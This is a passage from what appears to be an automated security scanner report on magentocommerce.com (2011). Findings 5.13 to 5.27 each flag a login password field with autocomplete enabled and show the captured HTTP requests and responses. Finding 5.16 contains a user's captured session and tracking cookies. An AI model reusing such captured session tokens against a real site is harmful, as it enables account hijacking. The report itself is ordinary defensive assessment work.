Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.13. http://www.magentocommerce.com/company/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.14. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.15. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.16. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.17. http://www.magentocommerce.com/company/contact-us/thank_you  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.18. http://www.magentocommerce.com/company/events  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.19. http://www.magentocommerce.com/company/events/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.20. http://www.magentocommerce.com/company/inthepress  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.21. http://www.magentocommerce.com/company/inthepress/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.22. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.23. http://www.magentocommerce.com/company/leadership  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.24. http://www.magentocommerce.com/company/leadership/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.25. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.26. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.27. http://www.magentocommerce.com/company/pci-compliance  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

